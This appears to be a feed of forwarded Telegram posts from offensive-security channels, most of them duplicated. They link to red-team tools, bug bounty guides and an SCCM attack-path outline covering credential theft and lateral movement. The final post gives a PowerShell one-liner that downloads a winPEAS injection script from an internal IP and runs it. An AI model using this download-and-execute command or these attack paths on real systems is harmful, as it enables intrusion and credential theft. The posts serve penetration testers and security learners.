Forwarded from Offensive Xwitter
👹 [ snovvcrash, sn🥶vvcr💥sh ]
FYI, #masscan users. The original masscan does NOT include the ‘TCP options’ field with MSS value which is required for some hosts to reply to the packet. The fork by @IvreRocks features the
For me that’s the masscan version of choice from now on:
🔗 https://github.com/ivre/masscan
🐥 [ tweet ]
FYI, #masscan users. The original masscan does NOT include the ‘TCP options’ field with MSS value which is required for some hosts to reply to the packet. The fork by @IvreRocks features the
--tcpmss switch that includes the mentioned field for your better scope coverage.For me that’s the masscan version of choice from now on:
🔗 https://github.com/ivre/masscan
🐥 [ tweet ]
Forwarded from Offensive Xwitter
😈 [ harmj0y, Will Schroeder - ✈ HACKER SUMMER CAMP ]
@tifkin_ , @0xdab0 , and I are very proud to announce that the alpha release of Nemesis is now public! The code is at and we have a post explaining details at 1/3
🔗 https://github.com/SpecterOps/Nemesis
🔗 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
🐥 [ tweet ]
@tifkin_ , @0xdab0 , and I are very proud to announce that the alpha release of Nemesis is now public! The code is at and we have a post explaining details at 1/3
🔗 https://github.com/SpecterOps/Nemesis
🔗 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
🐥 [ tweet ]
Forwarded from APT
🪄 Red Wizard
This tool automates the deployment of a comprehensive infrastructure with redirectors, backend systems, phishing relays, OSINT machines, and more. It is designed to be user-friendly, providing wizards to walk administrators and Red Team operators through the deployment process. The infrastructure is also self-documenting, making the sharing of all relevant details to the team of operators an effortless task.
🌐 Details:
https://www.secura.com/blog/red-wizard-1
#redteam #relay #infrastructure #phishing
This tool automates the deployment of a comprehensive infrastructure with redirectors, backend systems, phishing relays, OSINT machines, and more. It is designed to be user-friendly, providing wizards to walk administrators and Red Team operators through the deployment process. The infrastructure is also self-documenting, making the sharing of all relevant details to the team of operators an effortless task.
🌐 Details:
https://www.secura.com/blog/red-wizard-1
#redteam #relay #infrastructure #phishing
Forwarded from Cybred
https://blog.securitybreached.org/2023/08/18/bug-bounty-blueprint-a-beginners-guide/
Подробное руководство по Bug Bounty в 2023 году. Где, что и как нужно искать, чтобы получить максимальный профит.
Много ссылок на кейсы из жизни, ресерчи известных баг хантеров, лабы и репозитории с полезными утилитами.
Подробное руководство по Bug Bounty в 2023 году. Где, что и как нужно искать, чтобы получить максимальный профит.
Много ссылок на кейсы из жизни, ресерчи известных баг хантеров, лабы и репозитории с полезными утилитами.
Security Breached Blog
Bug Bounty Blueprint: A Beginner's Guide
This guide is a must-read for beginners to dive into Bug Bounty Hunting. It provides foundational skills, tips, tools, and resources for Bug Bounty Hunters. I've covered various aspects including vulnerabilities and learning resources. Are you ready to embark…
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
⚛️ Nuclei Templates AI Generator
Nuclei Template Editor - AI-powered hub to create, debug, scan, and store templates. Covering a wide array of vulnerabilities using public templates & rich CVE data.
📝 Note:
Current focus is HTTP, more protocols coming soon
🌐 Source:
https://templates.nuclei.sh
https://docs.nuclei.sh/editor
#nuclei #template #generator
Nuclei Template Editor - AI-powered hub to create, debug, scan, and store templates. Covering a wide array of vulnerabilities using public templates & rich CVE data.
📝 Note:
Current focus is HTTP, more protocols coming soon
🌐 Source:
https://templates.nuclei.sh
https://docs.nuclei.sh/editor
#nuclei #template #generator
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Довольно интересна и свежая серия статей, в частности по AD и чуть-чуть туннелям
1. https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform
2. https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform-part-2
3. https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform-part-3
#ad #pentest #redteam #lofl
1. https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform
2. https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform-part-2
3. https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform-part-3
#ad #pentest #redteam #lofl
Forwarded from Acrono
Forwarded from 1N73LL1G3NC3
Offensive SCCM Summary
Table of Contents:
- Tooling & Who To Follow
- SCCM Attack Paths
- Recon – Find SCCM Infrastructure
- Credential Access – Obtain PXE Media File
- Credential Access – Obtain NAA Creds
- Credential Access – Read unattend.xml
- Recon – Identify Site Information
- Enumeration – Logs
- Enumeration – Previously Executed Scripts
- Recon – Enumerate SiteStore Scripts
- Enumeration – SCCMContentLib
- Enumeration – PXEBoot Shares
-Credential Access – NAA
- ms-DS-MachineAccountQuota
- Credential Access – Client Push Account
- Lateral Movement – Client Push Account
- Lateral Movement – Via SQL
- Lateral Movement – Via AdminService API
- Lateral Movement – NTLM Relay To Other SCCM Clients
- SQL DB Admin To Primary Site DB (Obtain SCCM User Creds, Dumping Task Sequences)
- Coerce NTLM Authentication
- Primary Site Admin
- Recon – Perform Recon Queries
- Lateral Movement – Deploy an application
- Lateral Movement – Arbitrary NTLM Coercion
Table of Contents:
- Tooling & Who To Follow
- SCCM Attack Paths
- Recon – Find SCCM Infrastructure
- Credential Access – Obtain PXE Media File
- Credential Access – Obtain NAA Creds
- Credential Access – Read unattend.xml
- Recon – Identify Site Information
- Enumeration – Logs
- Enumeration – Previously Executed Scripts
- Recon – Enumerate SiteStore Scripts
- Enumeration – SCCMContentLib
- Enumeration – PXEBoot Shares
-Credential Access – NAA
- ms-DS-MachineAccountQuota
- Credential Access – Client Push Account
- Lateral Movement – Client Push Account
- Lateral Movement – Via SQL
- Lateral Movement – Via AdminService API
- Lateral Movement – NTLM Relay To Other SCCM Clients
- SQL DB Admin To Primary Site DB (Obtain SCCM User Creds, Dumping Task Sequences)
- Coerce NTLM Authentication
- Primary Site Admin
- Recon – Perform Recon Queries
- Lateral Movement – Deploy an application
- Lateral Movement – Arbitrary NTLM Coercion
Forwarded from 1N73LL1G3NC3
🔑 HAITI
Hash type identifier (CLI & lib)
Features:
— 519+ hash types detected
— Modern algorithms supported (SHA3, Keccak, Blake2, etc.)
— Hashcat and John the Ripper references
— CLI tool & library
— Hackable
Hash type identifier (CLI & lib)
Features:
— 519+ hash types detected
— Modern algorithms supported (SHA3, Keccak, Blake2, etc.)
— Hashcat and John the Ripper references
— CLI tool & library
— Hackable
Forwarded from reewardius' 🇺🇦
вот тебе матрицы, на вебера и на инфру, что тебе ближе и к чему душа лежит - решать тебе, на какие сертификации равняться, чтобы видеть уровень - тоже есть.
инфра: https://docs.google.com/spreadsheets/d/1yrQRyYS7Li3UpDwJoRqJ7uxD0g-ctm3I9-o-jHgzymg/edit#gid=1689065888
веб: https://docs.google.com/spreadsheets/d/1yrQRyYS7Li3UpDwJoRqJ7uxD0g-ctm3I9-o-jHgzymg/edit#gid=0
инфра: https://docs.google.com/spreadsheets/d/1yrQRyYS7Li3UpDwJoRqJ7uxD0g-ctm3I9-o-jHgzymg/edit#gid=1689065888
веб: https://docs.google.com/spreadsheets/d/1yrQRyYS7Li3UpDwJoRqJ7uxD0g-ctm3I9-o-jHgzymg/edit#gid=0
Forwarded from sn🥶vvcr💥sh
Invoke-winPEASInject.ps1
3.7 MB
iex(new-object net.webclient).downloadstring("http://192.168.1.80/Invoke-winPEASInject.ps1");Invoke-winPEASInject